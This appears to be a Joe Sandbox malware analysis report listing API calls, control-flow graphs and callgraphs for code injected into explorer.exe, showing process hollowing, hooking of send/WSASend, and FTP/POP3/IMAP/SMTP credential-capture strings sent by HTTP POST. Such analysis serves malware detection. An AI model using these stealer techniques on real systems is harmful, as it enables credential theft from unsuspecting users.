                                                                                                                                                                                                                                • Part of subcall function 0032263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0032265A
                                                                                                                                                                                                                                • Part of subcall function 0032263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00322672
                                                                                                                                                                                                                                • Part of subcall function 0032263E: lstrlen.KERNEL32(?,00000000), ref: 0032267A
                                                                                                                                                                                                                                • Part of subcall function 0032263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00322685
                                                                                                                                                                                                                                • Part of subcall function 0032263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0032269F
                                                                                                                                                                                                                                • Part of subcall function 0032263E: wsprintfA.USER32 ref: 003226B6
                                                                                                                                                                                                                                • Part of subcall function 0032263E: CryptDestroyHash.ADVAPI32(?), ref: 003226CF
                                                                                                                                                                                                                                • Part of subcall function 0032263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003226D9
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00321389
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0032138F
                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 003213A1
                                                                                                                                                                                                                                • Part of subcall function 003224D5: GetCurrentProcessId.KERNEL32 ref: 003224E7
                                                                                                                                                                                                                                • Part of subcall function 003224D5: GetCurrentThreadId.KERNEL32 ref: 003224EF
                                                                                                                                                                                                                                • Part of subcall function 003224D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 003224FF
                                                                                                                                                                                                                                • Part of subcall function 003224D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0032250D
                                                                                                                                                                                                                                • Part of subcall function 003224D5: CloseHandle.KERNEL32(00000000), ref: 00322566
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 003213B8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 003213BF
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 003213E4
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 003213EB
                                                                                                                                                                                                                                • Part of subcall function 00321DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00321E1D
                                                                                                                                                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 0032141D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_321000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                                                                                                                                                              • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                                                                                                                                                              • API String ID: 706757162-1430290102
                                                                                                                                                                                                                              • Opcode ID: 970941ae62067530b63f284c5f31ad537a81ee2beb06634ef178f7dc3a41900d
                                                                                                                                                                                                                              • Instruction ID: 63051e3e9fd1fe92e6c793ba6b19e9e973aa847946bb70dc97499edb3658273e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 970941ae62067530b63f284c5f31ad537a81ee2beb06634ef178f7dc3a41900d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A315C31740234B7CB237F61FD0AFAF3669AF55741F018418F5065B191CF799A5287A1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 235 321647-32165a 236 321660-321662 235->236 237 321748-32174f 235->237 236->237 238 321668-32166b 236->238 238->237 239 321671-32167d lstrlen 238->239 240 321683-32168a lstrlen 239->240 241 321747 239->241 240->241 242 321690-3216a8 getpeername 240->242 241->237 242->241 243 3216ae-3216ca inet_ntoa htons 242->243 243->241 244 3216cc-3216d4 243->244 245 3216d6-3216d9 244->245 246 321708 244->246 248 3216f3-3216f8 245->248 249 3216db-3216de 245->249 247 32170d-32173c call 322861 wsprintfA call 3224ae 246->247 247->241 259 32173e-321745 call 322843 247->259 248->247 251 3216e0-3216e3 249->251 252 321701-321706 249->252 254 3216e5-3216ea 251->254 255 3216fa-3216ff 251->255 252->247 254->248 257 3216ec-3216f1 254->257 255->247 257->241 257->248 259->241
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_321000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                                                                                                                                                                              • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                                                                                                                                                                              • API String ID: 3379139566-1703351401
                                                                                                                                                                                                                              • Opcode ID: e6d4001e9adf17a1cab5a3f80757b7935dfc154eb3be5388c171a9374a47ee6c
                                                                                                                                                                                                                              • Instruction ID: ff1e61adb7fdf579f0757f31886a8b652cef9f3c1ea4ddcbe99bb4cdd50aeb24
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6d4001e9adf17a1cab5a3f80757b7935dfc154eb3be5388c171a9374a47ee6c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5921F736E00329A7DF135EBDEE885BE7ABD9BA5301F094079E845E3111CA39CE019B60

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 267 321752-321774 GetModuleHandleA GetProcAddress 268 3217c1-3217c6 267->268 269 321776-3217c0 RtlZeroMemory * 4 267->269 269->268
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00321539,?,?,?,0032144B,?), ref: 00321763
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0032176A
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(00324228,00000104), ref: 00321788
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(00324118,00000104), ref: 00321790
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(00324330,00000104), ref: 00321798
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(00324000,00000104), ref: 003217A1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_321000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MemoryZero$AddressHandleModuleProc
                                                                                                                                                                                                                              • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                                                                                                                                                                              • API String ID: 1490332519-278825019
                                                                                                                                                                                                                              • Opcode ID: 83e1e1fb19adb6929076c109104f43282b2bcb4613d33cdba945e27bc2d93605
                                                                                                                                                                                                                              • Instruction ID: de2d40660accd80bb0aba6186c161acace9de154088be6073ce1816c3ae356af
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83e1e1fb19adb6929076c109104f43282b2bcb4613d33cdba945e27bc2d93605
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F08932B8033C73812362AABC06CC7BD5CC551FA67074555F60563141D999790149F5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 003224E7
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 003224EF
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 003224FF
                                                                                                                                                                                                                              • Thread32First.KERNEL32(00000000,0000001C), ref: 0032250D
                                                                                                                                                                                                                              • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0032252C
                                                                                                                                                                                                                              • SuspendThread.KERNEL32(00000000), ref: 0032253C
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0032254B
                                                                                                                                                                                                                              • Thread32Next.KERNEL32(00000000,0000001C), ref: 0032255B
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00322566
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_321000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1467098526-0
                                                                                                                                                                                                                              • Opcode ID: 894c9a965039bb2cb689eb7f704da8471cdc7dd3412ff0aa2c34244e83a49f8b
                                                                                                                                                                                                                              • Instruction ID: 9718c0f2fc4de617a77799c7f3dfac95802bc072810ffc0efb08711e5d019736
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 894c9a965039bb2cb689eb7f704da8471cdc7dd3412ff0aa2c34244e83a49f8b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3113C71504211EFD7229F61BC4CB6FBBACFF86B01F14851DF64292150D7388A0A9BB2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 281 321f4a-321fa5 call 3222b8 call 322861 call 3227e2 call 322374 290 321fc0-321fcc 281->290 291 321fa7-321fbe 281->291 294 321fd0-321fd2 290->294 291->294 295 3222a6-3222b5 call 322843 294->295 296 321fd8-32200f RtlZeroMemory 294->296 300 322015-322030 296->300 301 32229e-3222a5 296->301 302 322062-322074 300->302 303 322032-322043 call 3222e5 300->303 301->295 310 322078-32207a 302->310 308 322056 303->308 309 322045-322054 303->309 311 322058-322060 308->311 309->311 312 322080-3220dc call 322731 310->312 313 32228b-322291 310->313 311->310 321 3220e2-3220e7 312->321 322 322284 312->322 315 322293-322295 call 322843 313->315 316 32229a 313->316 315->316 316->301 323 322101-32212f call 322861 wsprintfW 321->323 324 3220e9-3220fa 321->324 322->313 327 322131-322133 323->327 328 322148-32215f 323->328 324->323 329 322134-322137 327->329 334 322161-322197 call 322861 wsprintfW 328->334 335 32219e-3221b8 328->335 330 322142-322144 329->330 331 322139-32213e 329->331 330->328 331->329 333 322140 331->333 333->328 334->335 339 322261-322277 call 322843 335->339 340 3221be-3221d1 335->340 347 322280 339->347 348 322279-32227b call 322843 339->348 340->339 343 3221d7-3221ed call 322861 340->343 351 3221ef-3221fa 343->351 347->322 348->347 352 32220e-322225 351->352 353 3221fc-322209 call 322826 351->353 357 322227 352->357 358 322229-322236 352->358 353->352 357->358 358->351 359 322238-32223c 358->359 360 322256-32225d call 322843 359->360 361 32223e 359->361 360->339 362 32223e call 322815 361->362 364 322243-322250 RtlMoveMemory 362->364 364->360
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00322861: GetProcessHeap.KERNEL32(00000008,0000A000,003210CC), ref: 00322864
                                                                                                                                                                                                                                • Part of subcall function 00322861: RtlAllocateHeap.NTDLL(00000000), ref: 0032286B
                                                                                                                                                                                                                                • Part of subcall function 003227E2: lstrlen.KERNEL32(003240DA,?,00000000,00000000,00321F86,74DE8A60,003240DA,00000000), ref: 003227EA
                                                                                                                                                                                                                                • Part of subcall function 003227E2: MultiByteToWideChar.KERNEL32(00000000,00000000,003240DA,00000001,00000000,00000000), ref: 003227FC
                                                                                                                                                                                                                                • Part of subcall function 00322374: RtlZeroMemory.NTDLL(?,00000018), ref: 00322386
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,0000003C), ref: 00321FE2
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0032211B
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00322186
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00322250
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_321000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                                                                                                              • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                                                                                                              • API String ID: 4204651544-1701262698
                                                                                                                                                                                                                              • Opcode ID: 32e3bcc2707b20c3891fef6ddb61959757dea9c0fef54fd03fa9d74db4469072
                                                                                                                                                                                                                              • Instruction ID: aa46de621e2461934d6eeac180b2e08d88a5ffffef72ee6998ae5046f14528de
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32e3bcc2707b20c3891fef6ddb61959757dea9c0fef54fd03fa9d74db4469072
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DA17E71608314AFD322DF64EC85A2BBBE8FB88340F10492DF946D7261DA75DE05CB62

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 414 3225ad-3225c9 OpenProcess 415 322600-322607 414->415 416 3225cb-3225da IsWow64Process 414->416 417 3225f7 416->417 418 3225dc-3225ec IsWow64Process 416->418 419 3225f9-3225fa CloseHandle 417->419 418->419 420 3225ee-3225f5 418->420 419->415 420->419
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,74DEE800,?,?,microsoftedgecp.exe,00321287), ref: 003225BF
                                                                                                                                                                                                                              • IsWow64Process.KERNEL32(000000FF,?), ref: 003225D1
                                                                                                                                                                                                                              • IsWow64Process.KERNEL32(00000000,?), ref: 003225E4
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 003225FA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_321000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                                                                                                              • String ID: microsoftedgecp.exe
                                                                                                                                                                                                                              • API String ID: 331459951-1475183003
                                                                                                                                                                                                                              • Opcode ID: 82c70fb7446e31503e480d2416dfbb7cbe30afed14eab986944ffe10595852ad
                                                                                                                                                                                                                              • Instruction ID: c0f1ec9cb39257d2899e7df002e82ce0862451516ba83fdf7635085b0b8b1d9b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82c70fb7446e31503e480d2416dfbb7cbe30afed14eab986944ffe10595852ad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DF09671902228FF9B21CF90AD448EFB76CEF02351F24425DF90192140D7354F05E6B0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 421 321b17-321b2c 422 321b60-321b68 421->422 423 321b2e 421->423 425 321bc3-321bcb 422->425 426 321b6a-321b6f 422->426 424 321b30-321b5e RtlMoveMemory 423->424 424->422 424->424 427 321c0b 425->427 428 321bcd-321bdf 425->428 429 321bbe-321bc1 426->429 432 321c0d-321c12 427->432 428->427 431 321be1-321bfe LdrProcessRelocationBlock 428->431 429->425 430 321b71-321b84 LoadLibraryA 429->430 434 321c15-321c17 430->434 435 321b8a-321b8f 430->435 431->427 433 321c00-321c04 431->433 433->427 436 321c06-321c09 433->436 434->432 437 321bb6-321bb9 435->437 436->427 436->431 438 321b91-321b95 437->438 439 321bbb 437->439 440 321b97-321b9a 438->440 441 321b9c-321b9f 438->441 439->429 442 321ba1-321bab GetProcAddress 440->442 441->442 442->434 443 321bad-321bb3 442->443 443->437
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(?,?,?), ref: 00321B4E
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,00324434,00000000,00000000,74DF2EE0,00000000,00321910,?,?,?,00000001,?,00000000), ref: 00321B76
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00321BA3
                                                                                                                                                                                                                              • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00321BF4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_321000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3827878703-0
                                                                                                                                                                                                                              • Opcode ID: 5e841adffb7d08e2557259767107b5d614e023aaead2da167458e72a5285e349
                                                                                                                                                                                                                              • Instruction ID: e42569d9f457da97cafa6837f5d22befbb840cf8c778029f18e48d759d5ae085
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e841adffb7d08e2557259767107b5d614e023aaead2da167458e72a5285e349
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C31A175700225ABCB2ACF29DA84B76B7E8FF25315F15456CE886C7600E735E846CBA0

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:8.8%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                              Total number of Nodes:9
                                                                                                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                                                                                                              execution_graph 765 729fab 766 729fd8 765->766 768 729ff8 765->768 769 72a048 766->769 773 72a04d 769->773 770 72a190 VirtualProtect VirtualProtect 772 72a1e8 770->772 771 72a135 LoadLibraryA 771->773 772->772 773->770 773->771 774 72a185 773->774 774->768

                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                                              callgraph 0 Function_00721B70 1 Function_00721E70 2 Function_00722B70 32 Function_00721838 2->32 51 Function_00721A04 2->51 3 Function_007230F0 12 Function_00721860 3->12 23 Function_00721C58 3->23 3->32 55 Function_00721A88 3->55 57 Function_00722508 3->57 4 Function_00721576 5 Function_00722BF4 6 Function_00722774 7 Function_007218F8 8 Function_007214F9 9 Function_007225FC 10 Function_00722860 10->0 10->6 37 Function_00722620 10->37 11 Function_00721560 12->0 13 Function_007224E0 14 Function_007218E8 15 Function_0072156C 16 Function_007218D0 17 Function_00721D50 17->32 18 Function_00721254 19 Function_007214D4 20 Function_00721DD4 20->32 21 Function_00722054 21->1 21->7 21->12 21->16 26 Function_00721F40 21->26 21->32 33 Function_00721938 21->33 44 Function_00722010 21->44 60 Function_0072188C 21->60 22 Function_0072B0D5 24 Function_00724059 25 Function_0072355C 25->0 25->3 25->25 25->32 36 Function_00723220 25->36 26->7 26->32 27 Function_00724A41 28 Function_007225C4 28->9 29 Function_0072A048 53 Function_0072A00A 29->53 30 Function_007214B2 31 Function_00721BB0 34 Function_00722CB8 34->12 34->32 38 Function_00721D20 34->38 35 Function_00721822 36->0 36->10 36->31 36->32 36->33 43 Function_00721C28 36->43 56 Function_00721C08 36->56 39 Function_00723020 39->0 47 Function_00722E98 39->47 40 Function_007241A1 41 Function_007245A7 42 Function_00729FAB 42->29 44->51 45 Function_0072B115 46 Function_00722418 46->12 46->21 46->32 47->2 47->5 47->20 47->34 47->51 58 Function_00722E08 47->58 48 Function_0072141D 49 Function_00721000 50 Function_00722E80 52 Function_00721405 54 Function_00721508 57->13 57->16 57->28 58->12 58->14 58->17 58->46 59 Function_00723088 59->0 59->47 60->32

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 119 72355c-72356c call 721b70 122 723572-7235a5 call 721838 119->122 123 7235fc-723601 119->123 127 7235d1-7235f6 NtUnmapViewOfSection 122->127 128 7235a7 call 721838 122->128 132 723608-723617 call 723220 127->132 133 7235f8-7235fa 127->133 130 7235ac-7235c5 128->130 130->127 138 723621-72362a 132->138 139 723619-72361c call 72355c 132->139 133->123 134 723602-723607 call 7230f0 133->134 134->132 139->138
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL ref: 007235D8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3006599543.0000000000721000.00000040.80000000.00040000.00000000.sdmp, Offset: 00721000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_721000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: SectionUnmapView
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 498011366-0
                                                                                                                                                                                                                              • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                                                                                                              • Instruction ID: 39286fce25c46bbaa289fcc459830372d7a1c4451b0d3b5d922c6a61e3c26edc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1311E730711E199FFB5CFBB8A89D27937A0FB14301F54013AA419C76A1DE3D8A41C701

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 723220-72325b call 721838 3 723261-723273 CreateToolhelp32Snapshot 0->3 4 723549-723554 SleepEx 3->4 5 723279-72328f Process32First 3->5 4->3 6 723538-72353a 5->6 7 723540-723543 CloseHandle 6->7 8 723294-7232ac 6->8 7->4 10 7232b2-7232c6 8->10 11 72348c-723495 call 721bb0 8->11 10->11 15 7232cc-7232e0 10->15 16 72352a-723532 Process32Next 11->16 17 72349b-7234a4 call 721c08 11->17 15->11 22 7232e6-7232fa 15->22 16->6 17->16 21 7234aa-7234b1 call 721c28 17->21 21->16 26 7234b3-7234c1 call 721b70 21->26 22->11 27 723300-723314 22->27 26->16 31 7234c3-723525 call 721938 call 722860 call 721938 26->31 27->11 32 72331a-72332e 27->32 31->16 32->11 35 723334-723348 32->35 35->11 40 72334e-723362 35->40 40->11 44 723368-72337c 40->44 44->11 46 723382-723396 44->46 46->11 48 72339c-7233b0 46->48 48->11 50 7233b6-7233ca 48->50 50->11 52 7233d0-7233e4 50->52 52->11 54 7233ea-7233fe 52->54 54->11 56 723404-723418 54->56 56->11 58 72341a-72342e 56->58 58->11 60 723430-723444 58->60 60->11 62 723446-72345a 60->62 62->11 64 72345c-723470 62->64 64->11 66 723472-723486 64->66 66->11 66->16
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3006599543.0000000000721000.00000040.80000000.00040000.00000000.sdmp, Offset: 00721000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_721000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2482764027-0
                                                                                                                                                                                                                              • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                                                                                                                              • Instruction ID: 2c8db0111034d6fc92403bf49fe7bc5c4b07d9cdb02088c45308d6fa9911d108
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A8130312186588FE706EF25FC58BEAB7A1FB50740F54466AA447C71A0EF7CEA04CB81

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 68 72a048-72a04b 69 72a055-72a059 68->69 70 72a065 69->70 71 72a05b-72a063 69->71 72 72a067 70->72 73 72a04d-72a053 70->73 71->70 74 72a06a-72a071 72->74 73->69 76 72a073-72a07b 74->76 77 72a07d 74->77 76->77 77->74 78 72a07f-72a082 77->78 79 72a097-72a0a4 78->79 80 72a084-72a092 78->80 90 72a0a6-72a0a8 79->90 91 72a0be-72a0cc call 72a00a 79->91 81 72a094-72a095 80->81 82 72a0ce-72a0e9 80->82 81->79 84 72a11a-72a11d 82->84 85 72a122-72a129 84->85 86 72a11f-72a120 84->86 89 72a12f-72a133 85->89 88 72a101-72a105 86->88 92 72a107-72a10a 88->92 93 72a0eb-72a0ee 88->93 94 72a190-72a1e4 VirtualProtect * 2 89->94 95 72a135-72a14e LoadLibraryA 89->95 96 72a0ab-72a0b2 90->96 91->69 92->85 97 72a10c-72a110 92->97 93->85 101 72a0f0 93->101 98 72a1e8-72a1ed 94->98 100 72a14f-72a156 95->100 113 72a0b4-72a0ba 96->113 114 72a0bc 96->114 102 72a112-72a119 97->102 103 72a0f1-72a0f5 97->103 98->98 104 72a1ef-72a1fe 98->104 100->89 106 72a158 100->106 101->103 102->84 103->88 107 72a0f7-72a0f9 103->107 110 72a164-72a16c 106->110 111 72a15a-72a162 106->111 107->88 112 72a0fb-72a0ff 107->112 115 72a16e-72a17a 110->115 111->115 112->88 112->92 113->114 114->91 114->96 117 72a185-72a18f 115->117 118 72a17c-72a183 115->118 118->100
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE ref: 0072A147
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0072A1BB
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE ref: 0072A1D9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3006599543.0000000000727000.00000040.80000000.00040000.00000000.sdmp, Offset: 00727000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_727000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 895956442-0
                                                                                                                                                                                                                              • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                                                                                                                              • Instruction ID: b1abab5e3ec9600837689482dac657d64f4ade66c3367d4b3968a6637f0ef2ea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4514732758A3D6BCB34AA38BCC46B9B7D1E755335F18063AD48AC3285F95DD8468383

                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                                              • Disassembly available
